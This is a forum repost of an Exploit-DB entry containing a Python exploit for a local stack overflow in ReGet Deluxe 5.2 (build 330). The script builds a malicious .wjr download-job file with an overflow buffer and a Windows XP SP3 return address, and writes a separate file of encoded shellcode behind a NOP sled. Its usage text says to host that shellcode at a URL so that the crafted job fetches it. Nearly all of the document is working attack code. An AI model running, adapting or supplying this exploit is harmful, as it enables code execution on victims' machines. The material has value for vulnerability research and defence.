Exploit ReGet Deluxe 5.2 (build 330) - Local Stack Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10664
Проверка EDB
  1. Пройдено
Автор
ENCRYPT3D.M!ND
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
null
Дата публикации
2009-12-25
Код:
import sys

print ""
print "    ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"
print "    By: Encrypt3d.M!nd                                 "
print "    http://m1nd3d.wordpress.com/                       "
print "      For Details visit my blog                        "
print ""


try:

 header = (
"\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30\x22\x20\x65\x6E\x63\x6F"
"\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D\x38\x22\x20\x3F\x3E\x0D\x0A\x3C\x21\x2D\x2D\x20\x47\x65"
"\x6E\x65\x72\x61\x74\x65\x64\x20\x62\x79\x20\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x20"
"\x35\x2E\x32\x20\x28\x62\x75\x69\x6C\x64\x20\x33\x33\x30\x29\x20\x2D\x2D\x3E\x0D\x0A\x3C\x52\x65"
"\x47\x65\x74\x4A\x72\x0D\x0A\x09\x4C\x61\x73\x74\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09\x50\x72\x65"
"\x64\x65\x66\x69\x6E\x65\x64\x43\x61\x74\x65\x67\x6F\x72\x69\x65\x73\x3D\x22\x31\x22\x0D\x0A\x09"
"\x54\x72\x61\x66\x66\x69\x63\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x54"
"\x72\x61\x66\x66\x69\x63\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x32\x22\x0D\x0A\x09"
"\x4D\x61\x78\x53\x65\x63\x74\x53\x75\x73\x70\x65\x6E\x64\x65\x64\x3D\x22\x31\x22\x0D\x0A\x09\x4D"
"\x61\x78\x53\x65\x63\x74\x43\x6F\x6F\x70\x65\x72\x61\x74\x69\x76\x65\x3D\x22\x31\x22\x0D\x0A\x09"
"\x4D\x61\x78\x53\x65\x63\x74\x55\x6E\x6C\x69\x6D\x69\x74\x65\x64\x3D\x22\x33\x22\x0D\x0A\x09\x53"
"\x61\x76\x65\x54\x6F\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x20\x61\x6E\x64\x20"
"\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79\x20\x44\x6F\x63\x75"
"\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x22\x0D\x0A\x09\x4D\x61"
"\x78\x45\x72\x72\x6F\x72\x43\x6F\x75\x6E\x74\x3D\x22\x31\x30\x30\x22\x0D\x0A\x09\x54\x72\x79\x50"
"\x61\x75\x73\x65\x3D\x22\x35\x22\x0D\x0A\x09\x54\x69\x6D\x65\x4F\x75\x74\x3D\x22\x39\x30\x22\x0D"
"\x0A\x09\x4D\x69\x6E\x53\x65\x63\x74\x69\x6F\x6E\x53\x69\x7A\x65\x3D\x22\x31\x30\x30\x30\x30\x22"
"\x0D\x0A\x09\x41\x75\x74\x6F\x53\x61\x76\x65\x52\x65\x73\x75\x6C\x74\x46\x69\x6C\x65\x3D\x22\x43"
"\x3A\x5C\x50\x72\x6F\x67\x72\x61\x6D\x20\x46\x69\x6C\x65\x73\x5C\x52\x65\x47\x65\x74\x20\x53\x6F"
"\x66\x74\x77\x61\x72\x65\x5C\x52\x65\x47\x65\x74\x20\x44\x65\x6C\x75\x78\x65\x5C\x73\x65\x61\x72"
"\x63\x68\x2E\x78\x6D\x6C\x22\x0D\x0A\x09\x3E\x0D\x0A\x09\x3C\x51\x75\x65\x75\x65\x3E\x0D\x0A\x09"
"\x09\x3C\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x0D\x0A\x09\x09\x09\x49\x64\x3D\x22\x31\x22\x0D\x0A\x09"
"\x09\x09\x46\x69\x6C\x65\x4E\x61\x6D\x65\x3D\x22\x43\x3A\x5C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73"
"\x20\x61\x6E\x64\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x75\x6E\x6B\x6E\x6F\x77\x6E\x5C\x4D\x79"
"\x20\x44\x6F\x63\x75\x6D\x65\x6E\x74\x73\x5C\x4D\x79\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x73\x5C"
"\x61\x2E\x65\x78\x65\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x74\x65\x3D\x22\x33\x22\x0D\x0A\x09\x09"
"\x09\x44\x6F\x6E\x74\x55\x73\x65\x43\x61\x74\x65\x67\x6F\x72\x79\x53\x6F\x72\x74\x69\x6E\x67\x3D"
"\x22\x30\x22\x0D\x0A\x09\x09\x09\x53\x74\x61\x72\x74\x44\x6C\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D"
"\x0A\x09\x09\x09\x43\x72\x65\x61\x74\x69\x6F\x6E\x54\x69\x6D\x65\x3D\x22\x32\x35\x2E\x31\x32\x2E"
"\x32\x30\x30\x39\x20\x31\x34\x3A\x35\x38\x3A\x30\x32\x22\x0D\x0A\x09\x09\x09\x4C\x61\x73\x74\x53"
"\x74\x61\x72\x74\x54\x69\x6D\x65\x3D\x22\x30\x22\x0D\x0A\x09\x09\x09\x55\x72\x6C\x3D\x22\x68\x74"
"\x74\x70\x3A\x2F\x2F"+sys.argv[1]+"\x22\x0D\x0A\x09"
"\x09\x09\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x43\x61\x74\x65\x67\x6F\x72\x79\x3D\x22\x2D\x31\x22\x0D"
"\x0A\x09\x09\x09\x53\x61\x76\x65\x54\x6F\x3D\x22")

 buff = "\x41" * 268
 buff+= "\x5F\x4D\x48\x7E" # call edi - winxp sp3 (friendly chars)
 buff+= "\x41" * 1000

 foot = (
"\x22\x0D\x0A\x09\x09\x09\x41\x75\x74\x6F\x53\x74\x61\x72\x74\x43\x72\x65\x61\x74\x65\x3D\x22\x31"
"\x22\x0D\x0A\x09\x09\x20\x2F\x3E\x0D\x0A\x09\x3C\x2F\x51\x75\x65\x75\x65\x3E\x0D\x0A\x3C\x2F\x52"
"\x65\x47\x65\x74\x4A\x72\x3E\x0D\x0A")

 evil = "\x90" * 100
 evil+= (
"\x89\xe6\xd9\xc7\xd9\x76\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x4c\x49\x43\x30\x43\x30\x45\x50\x45\x30\x4b\x39"
"\x4a\x45\x46\x51\x4e\x32\x51\x74\x4c\x4b\x46\x32\x44\x70\x4c"
"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4e\x6b\x51\x62"
"\x47\x58\x44\x4f\x48\x37\x51\x5a\x45\x76\x46\x51\x49\x6f\x45"
"\x61\x4f\x30\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x45\x52\x46\x4c"
"\x47\x50\x4f\x31\x4a\x6f\x44\x4d\x45\x51\x4f\x37\x4d\x32\x48"
"\x70\x42\x72\x46\x37\x4c\x4b\x46\x32\x42\x30\x4e\x6b\x50\x42"
"\x45\x6c\x47\x71\x4e\x30\x4e\x6b\x51\x50\x51\x68\x4c\x45\x4f"
"\x30\x44\x34\x51\x5a\x46\x61\x48\x50\x42\x70\x4c\x4b\x50\x48"
"\x42\x38\x4c\x4b\x50\x58\x51\x30\x46\x61\x4e\x33\x4d\x33\x47"
"\x4c\x43\x79\x4c\x4b\x50\x34\x4c\x4b\x46\x61\x4a\x76\x46\x51"
"\x49\x6f\x44\x71\x49\x50\x4c\x6c\x4b\x71\x4a\x6f\x46\x6d\x47"
"\x71\x4f\x37\x46\x58\x4b\x50\x43\x45\x4a\x54\x43\x33\x43\x4d"
"\x4b\x48\x47\x4b\x43\x4d\x51\x34\x43\x45\x4b\x52\x42\x78\x4c"
"\x4b\x46\x38\x45\x74\x46\x61\x4a\x73\x45\x36\x4c\x4b\x46\x6c"
"\x50\x4b\x4e\x6b\x43\x68\x45\x4c\x46\x61\x4e\x33\x4c\x4b\x46"
"\x64\x4e\x6b\x43\x31\x4e\x30\x4e\x69\x51\x54\x46\x44\x51\x34"
"\x51\x4b\x51\x4b\x43\x51\x51\x49\x51\x4a\x50\x51\x49\x6f\x49"
"\x70\x51\x48\x51\x4f\x43\x6a\x4c\x4b\x42\x32\x4a\x4b\x4f\x76"
"\x43\x6d\x50\x6a\x47\x71\x4e\x6d\x4d\x55\x4e\x59\x47\x70\x43"
"\x30\x45\x50\x46\x30\x42\x48\x44\x71\x4e\x6b\x42\x4f\x4f\x77"
"\x4b\x4f\x4a\x75\x4d\x6b\x4d\x30\x45\x4d\x46\x4a\x44\x4a\x42"
"\x48\x49\x36\x4c\x55\x4d\x6d\x4d\x4d\x49\x6f\x4e\x35\x45\x6c"
"\x45\x56\x51\x6c\x44\x4a\x4b\x30\x4b\x4b\x4b\x50\x51\x65\x44"
"\x45\x4d\x6b\x50\x47\x44\x53\x42\x52\x50\x6f\x42\x4a\x43\x30"
"\x46\x33\x4b\x4f\x4a\x75\x42\x43\x50\x61\x50\x6c\x42\x43\x43"
"\x30\x41\x41")

 evil+="\x41" * 70000


 wjr_file=open('devil.wjr','w')
 wjr_file.write(header+buff+foot)
 wjr_file.close()
 print "[+] 'devil.wjr' Created Successfully"

 devil_file=open('shellcode','w')
 devil_file.write(evil)
 devil_file.close()
 print "[+] 'shellcode' Created Successfully"

except:
  print "###################################################"
  print " Usage: exploit.py [payload]                       "
  print "     [payload] = url to shellcode without(http://) "
  print "    Example:                                       "
  print "      exploit.py www.site.com/shellcode            "
 
Источник
www.exploit-db.com

Похожие темы